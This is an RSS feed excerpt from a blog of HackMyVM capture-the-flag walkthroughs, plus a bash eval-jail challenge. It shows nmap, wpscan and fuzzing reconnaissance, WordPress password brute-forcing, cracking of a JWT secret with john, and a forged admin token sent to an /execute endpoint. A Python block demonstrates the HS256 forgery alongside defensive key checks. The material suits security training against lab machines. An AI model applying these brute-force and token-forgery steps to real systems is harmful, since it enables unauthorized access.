 |  - http://192.168.205.142/feed/, &lt;generator&gt;https://wordpress.org/?v=6.7.1&lt;/generator&gt;
 |  - http://192.168.205.142/comments/feed/, &lt;generator&gt;https://wordpress.org/?v=6.7.1&lt;/generator&gt;

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 &lt;========================================================&gt; (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.205.142/wp-json/wp/v2/users/?per_page=100&amp;page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 1
 | Requests Remaining: 18

[+] Finished: Wed Jan 15 20:13:57 2025
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 13.267 KB
[+] Data Received: 413.04 KB
[+] Memory used: 229.277 MB
[+] Elapsed time: 00:00:07
                                                     
```

The key information is `WordPress 6.7.1` and two usernames, `ta0` and `welcome`. `WordPress 6.7.1` has no known vulnerabilities, so the only option left is to brute-force passwords.

```bash
┌──(kali㉿kali)-[~/test]
└─$ wpscan -U ta0,welcome -P /usr/share/wordlists/q5000.txt --url http://192.168.205.142/             
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

(omitted)

[+] Performing password attack on Xmlrpc against 2 user/s
Trying ta0 / speaker Time: 00:01:37 &lt;=========================================================&gt; (10000 / 10000) 100.00% Time: 00:01:37

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jan 15 20:18:29 2025
[+] Requests Done: 10142
[+] Cached Requests: 34
[+] Data Sent: 5.147 MB
[+] Data Received: 5.559 MB
[+] Memory used: 278.031 MB
[+] Elapsed time: 00:01:40

```

Brute-forcing the first 5000 lines of `rockyou.txt` gave nothing, so there's no point continuing. The information so far doesn't reveal an attack surface, but a `WordPress` box has one more attack point: **plugins**.

```bash
┌──(kali㉿kali)-[~/test]
└─$ wpscan --url http://192.168.205.142/ -e ap --plugins-detection aggressive --api-token xxx   # register on the wpscan site to get an api-token
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
(omitted)

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:17:12 &lt;================================================&gt; (108550 / 108550) 100.00% Time: 00:17:12
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.205.142/wp-content/plugins/akismet/
 | Latest Version: 5.3.5 (up to date)
 | Last Updated: 2024-11-19T02:02:00.000Z
 | Readme: http://192.168.205.142/wp-content/plugins/akismet/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.205.142/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.205.142/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.205.142/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console &lt;= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.205.142/wp-content/plugins/wp-query-console/README.txt

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 15

[+] Finished: Wed Jan 15 20:39:16 2025
[+] Requests Done: 108575
[+] Cached Requests: 44
[+] Data Sent: 29.36 MB
[+] Data Received: 32.766 MB
[+] Memory used: 479.719 MB
[+] Elapsed time: 00:17:25

```

`wp-query-console` is vulnerable; let's search for whether an exploit is available.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_buster.html</guid><pubDate>Thu, 20 Mar 2025 07:57:23 +0000</pubDate></item><item><title>hmv_Blackhat2</title><link>https://7r1UMPH.github.io/post/hmv_Blackhat2.html</link><description># hmv_Blackhat2

**Target machine**: [HackMyVM - Blackhat2](https://hackmyvm.eu/machines/machine.php?vm=Blackhat2)
**Difficulty**: yellow
**Target IP**: 192.168.205.218
**Local IP**: 192.168.205.141

## 1. Port enumeration and service detection

First, scan the target IP for open ports with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.218
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 21:27 CST
Nmap scan report for 192.168.205.218
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
MAC Address: 08:00:27:17:26:A8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The `nmap` results show that the target has ports 22 (SSH) and 80 (HTTP) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Blackhat2.html</guid><pubDate>Thu, 20 Mar 2025 07:56:22 +0000</pubDate></item><item><title>hmv_azer</title><link>https://7r1UMPH.github.io/post/hmv_azer.html</link><description># hmv_azer

# 0. Overview

**Target machine**: [hackmyvm - azer](https://hackmyvm.eu/machines/machine.php?vm=Azer)
**Difficulty**: Green
**Target IP**: 192.168.205.235
**Local IP**: 192.168.205.141

---

# 1. Scanning

Run an initial port scan with `Nmap` to identify open ports and services:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS -p- -Pn -n -T4 192.168.205.235
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 11:19 CST
Nmap scan report for 192.168.205.235
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:07:E9:02 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
                                                           
```

The results show two open ports:

- **80/tcp** - HTTP service
- **3000/tcp** - reported as PPP, but actually a web application used for user authentication

---

# 2. Reconnaissance

The page on port `80` shows no obvious point of attack, so we scout port `3000`.

![image](https://github.com/user-attachments/assets/3b565e9c-e8cd-41ae-bf84-0cf6e7460d2e)

![image](https://github.com/user-attachments/assets/f2dcad05-b377-43e6-aa7b-159b04935536)

![image](https://github.com/user-attachments/assets/9ab7e04b-b4c3-4d36-9fdf-b4d1c827bf98)

Further exploration reveals that the application on port **3000** appears to verify passwords by executing a `.sh` script.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_azer.html</guid><pubDate>Thu, 20 Mar 2025 07:55:21 +0000</pubDate></item><item><title>hmv_aurora</title><link>https://7r1UMPH.github.io/post/hmv_aurora.html</link><description># hmv_aurora

# 0. Overview

**Target machine**: [hackmyvm - aurora](https://hackmyvm.eu/machines/machine.php?vm=aurora)
**Difficulty**: Green
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 10:12 CST
Nmap scan report for 192.168.205.138
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 08:00:27:68:BD:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
```

Port **3000** is most likely a **web** application.

# 2. Reconnaissance

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/
&lt;!DOCTYPE html&gt;
&lt;html lang='en'&gt;
&lt;head&gt;
&lt;meta charset='utf-8'&gt;
&lt;title&gt;Error&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;pre&gt;Cannot GET /&lt;/pre&gt;
&lt;/body&gt;
&lt;/html&gt;
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/
&lt;!DOCTYPE html&gt;
&lt;html lang='en'&gt;
&lt;head&gt;
&lt;meta charset='utf-8'&gt;
&lt;title&gt;Error&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;pre&gt;Cannot GET /&lt;/pre&gt;
&lt;/body&gt;
&lt;/html&gt;

```

`GET /` is not served, so we try `POST`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ feroxbuster -u 'http://192.168.205.138:3000' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md -m POST
                                                                                                                                    
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben 'epi' Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.205.138:3000
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, md]
 🏁  HTTP methods          │ [POST]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404     POST       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
401     POST        1l        2w       22c http://192.168.205.138:3000/login
400     POST        1l        6w       29c http://192.168.205.138:3000/register
401     POST        1l        2w       22c http://192.168.205.138:3000/Login
400     POST        1l        6w       29c http://192.168.205.138:3000/Register
401     POST        1l        1w       12c http://192.168.205.138:3000/execute

```

Request each discovered path with `curl`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/login -X POST
Identifiants invalides                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/register -X POST
The 'role' field is not valid                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/execute -X POST 
Unauthorized                                                                                                                                    

```

Let's try registering a user:

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{"role":"admin"}'
Not authorized !
```

Hmm. Throw it at `WFUZZ` and fuzz the `role` value:

```bash
┌──(kali㉿kali)-[~/test]
└─$ wfuzz -c -u 'http://192.168.205.138:3000/register' -X POST -H 'Content-Type: application/json' -d '{"role":"FUZZ"}' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 --hw 6
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.205.138:3000/register
Total requests: 62284

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000000003:   401        0 L      3 W        16 Ch       'admin'                                                             
000000022:   500        0 L      5 W        32 Ch       'user'                                                              

Total time: 58.91045
Processed Requests: 62284
Filtered Requests: 62282
Requests/sec.: 1057.265

```

Continue with the registration:

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{"role":"user"}'
Column 'username' cannot be null                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{"role":"user","username":"xxoo"}'
Column 'password' cannot be null                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{"role":"user","username":"xxoo","password":"xxoo"}'
Registration OK                                                                                                                                     
```

Now try logging in:

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/login -X POST -H 'Content-Type: application/json' -d '{"role":"user","username":"xxoo","password":"xxoo"}'
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Inh4b28iLCJyb2xlIjoidXNlciIsImlhdCI6MTczNzU5OTM0OH0.Q8Q3R6Bu_xXUKSTcrGR01y5-hB4ndX7vL1ck1H7XomA"}
```

This is clearly a `JWT`; decode it on the [website](https://jwt.io/):

![Image](https://github.com/user-attachments/assets/c55c1345-380f-4116-911b-b55fe1655ab6)

Brute-force the signing secret:

```bash
┌──(kali㉿kali)-[~/test]
└─$ echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Inh4b28iLCJyb2xlIjoidXNlciIsImlhdCI6MTczNzU5OTM0OH0.Q8Q3R6Bu_xXUKSTcrGR01y5-hB4ndX7vL1ck1H7XomA' &gt; hash
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 512/512 AVX512BW 16x])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nopassword       (?)   
1g 0:00:00:00 DONE (2025-01-23 10:31) 100.0g/s 4915Kp/s 4915Kc/s 4915KC/s 123456..trudy
Use the '--show' option to display all of the cracked passwords reliably
Session completed.
```

Change the parameters: edit the claims and re-sign the token with the recovered secret.

![Image](https://github.com/user-attachments/assets/8c4fe2dd-1e58-4776-b407-e717b8dd3ef6)
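
The whole weakness here is that the HS256 secret is a dictionary word. The Python below is an added example, not code from this post or from the box's login app, and uses only the standard library: it re-implements HS256 signing and verification, checks the post's own token against the cracked secret, shows that anyone who knows the secret can mint an admin token, and shows the two defensive fixes a service should ship with: a startup check that refuses keys shorter than the 32 bytes RFC 7518 requires, and a verifier that pins the algorithm instead of trusting the token's header. The helper names and the 32-byte random key are assumptions of the example.

```python
import base64
import hashlib
import hmac
import json
import secrets

# RFC 7518 requires an HS256 key of at least 256 bits (32 bytes); "nopassword" is 10 bytes.
MIN_HS256_KEY_BYTES = 32

# Token the box issued to the freshly registered "xxoo" user (copied from the post above).
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJ1c2VybmFtZSI6Inh4b28iLCJyb2xlIjoidXNlciIsImlhdCI6MTczNzU5OTM0OH0."
              "Q8Q3R6Bu_xXUKSTcrGR01y5-hB4ndX7vL1ck1H7XomA")
WEAK_SECRET = "nopassword"   # the value john recovered from rockyou.txt in the post


def _as_bytes(secret):
    return secret.encode("utf-8") if isinstance(secret, str) else secret


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret):
    """Build a compact HS256 JWT over the given claims."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = (header + "." + payload).encode("ascii")
    sig = hmac.new(_as_bytes(secret), signing_input, hashlib.sha256).digest()
    return header + "." + payload + "." + b64url_encode(sig)


def verify_hs256(token, secret):
    """Return the claims if the token carries a valid HS256 signature under secret, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except ValueError:
        return None
    # Pin the algorithm: the verifier decides which alg is acceptable, never the token.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(_as_bytes(secret), (header_b64 + "." + payload_b64).encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def key_is_strong_enough(secret):
    """Startup check a service should run: refuse HS256 keys shorter than 32 bytes."""
    return min(len(_as_bytes(secret)), MIN_HS256_KEY_BYTES) == MIN_HS256_KEY_BYTES


def forged_admin_accepted(server_secret, guessed_secret):
    """Would the server accept an admin token minted with a guessed secret?"""
    forged = sign_hs256({"username": "admin", "role": "admin"}, guessed_secret)
    claims = verify_hs256(forged, server_secret)
    return claims is not None and claims.get("role") == "admin"


def demo():
    strong_secret = secrets.token_bytes(MIN_HS256_KEY_BYTES)   # what the app should have used
    return {
        "page_token_valid_under_weak_secret": verify_hs256(PAGE_TOKEN, WEAK_SECRET) is not None,
        "weak_key_passes_check": key_is_strong_enough(WEAK_SECRET),
        "forged_admin_accepted_weak": forged_admin_accepted(WEAK_SECRET, WEAK_SECRET),
        "forged_admin_accepted_strong": forged_admin_accepted(strong_secret, WEAK_SECRET),
        "strong_key_passes_check": key_is_strong_enough(strong_secret),
    }


if __name__ == "__main__":
    print(demo())
```

The length check is a floor, not a guarantee: a 32-byte string taken from a wordlist is still guessable, so the key should come from `secrets.token_bytes` or an equivalent CSPRNG and live in configuration, not in source.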

Try that `execute` endpoint:

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.138:3000/execute -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzM3NTk5MzQ4fQ.L5acgyrWbMNdNDkCc5Li6oN-he1DS1Q8EyykWeLvsuk'
&lt;!DOCTYPE html&gt;
&lt;html lang='en'&gt;
&lt;head&gt;
&lt;meta charset='utf-8'&gt;
&lt;title&gt;Error&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;pre&gt;TypeError [ERR_INVALID_ARG_TYPE]: The &amp;quot;file&amp;quot; argument must be of type string. Received undefined&lt;br&gt; &amp;nbsp; &amp;nbsp;at validateString (internal/validators.js:120:11)&lt;br&gt; &amp;nbsp; &amp;nbsp;at normalizeSpawnArguments (child_process.js:411:3)&lt;br&gt; &amp;nbsp; &amp;nbsp;at spawn (child_process.js:547:16)&lt;br&gt; &amp;nbsp; &amp;nbsp;at Object.execFile (child_process.js:237:17)&lt;br&gt; &amp;nbsp; &amp;nbsp;at exec (child_process.js:158:25)&lt;br&gt; &amp;nbsp; &amp;nbsp;at /opt/login-app/app.js:69:3&lt;br&gt; &amp;nbsp; &amp;nbsp;at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)&lt;br&gt; &amp;nbsp; &amp;nbsp;at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)&lt;br&gt; &amp;nbsp; &amp;nbsp;at /opt/login-app/app.js:112:5&lt;br&gt; &amp;nbsp; &amp;nbsp;at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12&lt;/pre&gt;
&lt;/body&gt;
&lt;/html&gt;

```

The `Authorization` header starts with `Bearer`.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_aurora.html</guid><pubDate>Thu, 20 Mar 2025 07:54:19 +0000</pubDate></item><item><title>hmv_Apaches</title><link>https://7r1UMPH.github.io/post/hmv_Apaches.html</link><description># hmv_Apaches

# 0. Overview

**Target machine**: [hackmyvm - Apaches](https://hackmyvm.eu/machines/machine.php?vm=Apaches)
**Difficulty**: Green
**Target IP**: 192.168.205.143
**Local IP**: 192.168.205.141

# 1. Scanning

First, run a full port scan of the target with `nmap` to check for open ports and services:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 13:58 CST
Nmap scan report for 192.168.205.143
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B2:79:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```

The scan shows that the target is running **SSH** and **HTTP**.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Apaches.html</guid><pubDate>Thu, 20 Mar 2025 07:52:16 +0000</pubDate></item><item><title>hmv_airbind</title><link>https://7r1UMPH.github.io/post/hmv_airbind.html</link><description># hmv_airbind

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=airbind
**Difficulty**: Yellow
**Target IP**: 192.168.205.212
**Local IP**: 192.168.205.141

---

### **1. Port enumeration and service detection**

First, scan the target IP for open ports with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.212
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 17:39 CST
Nmap scan report for 192.168.205.212
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.57 ((Ubuntu))
MAC Address: 08:00:27:AD:E1:D7 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/29%OT=80%CT=1%CU=32430%PV=Y%DS=1%DC=D%G=Y%M=0800
OS:27%TM=677118F6%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=3F%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=3F
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds
```

The scan shows two ports on the target: 22 (SSH, reported as filtered) and 80 (HTTP, open).</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_airbind.html</guid><pubDate>Thu, 20 Mar 2025 07:51:14 +0000</pubDate></item><item><title>群主题</title><link>https://7r1UMPH.github.io/post/qun-zhu-ti.html</link><description>I haven't done a box or posted anything in a long time. Today I saw the group owner post a challenge in the group chat, so I played with it and wrote a quick writeup.

Challenge:

![image-20250322153403638](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250322153403675.png)

```bash
PATH=/usr/bin
read INPUT &lt; &lt;(head -n1 | tr -d '[A-Za-z0-9/]')
eval "$INPUT"
```

A quick glance shows that tr deletes every letter, digit and slash but keeps the special symbols, so there is something to work with.

PS: in the shell, `$@` stands for all of the script's arguments and can be interpreted by eval.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/qun-zhu-ti.html</guid><pubDate>Fri, 28 Feb 2025 07:38:41 +0000</pubDate></item><item><title>hmv_Arroutada</title><link>https://7r1UMPH.github.io/post/hmv_Arroutada.html</link><description># 0. Overview

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=Arroutada
**Difficulty**: Green
**Target IP**: 192.168.205.151
**Local IP**: 192.168.205.128

# 1. Scanning

Start with nmap:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.151
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 16:47 CST
Nmap scan report for 192.168.205.151
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:06:46:64 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.205.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
                                                        
```

# 2. Reconnaissance

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.151
&lt;div align='center'&gt;&lt;img src='imgs/apreton.png'&gt;&lt;/div&gt;
```

Brute-force directories:

```
┌──(kali㉿kali)-[~/test]
└─$ gobuster dir -u http://192.168.205.151 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,md | grep -v '403'
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.205.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt,md
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 59]
/.                    (Status: 200) [Size: 59]
/imgs                 (Status: 301) [Size: 317] [--&gt; http://192.168.205.151/imgs/]
/scout                (Status: 301) [Size: 318] [--&gt; http://192.168.205.151/scout/]
Progress: 598000 / 598005 (100.00%)
===============================================================                                                                      
Finished
===============================================================
```

Look at /scout:

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.151/scout/

&lt;div&gt;
&lt;p&gt;
Hi, Telly,
&lt;br&gt;
&lt;br&gt;
I just remembered that we had a folder with some important shared documents. The problem is that I don't know wich first path it was in, but I do know the second path. Graphically represented:
&lt;br&gt;
/scout/******/docs/
&lt;br&gt;
&lt;br&gt;
With continued gratitude,
&lt;br&gt;
J1.
&lt;/p&gt;
&lt;/div&gt;
&lt;!-- Stop please --&gt;
```

Brute-force the unknown path segment:

```
┌──(kali㉿kali)-[~/test]
└─$ wfuzz -u '192.168.205.151/scout/FUZZ/docs/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 28 
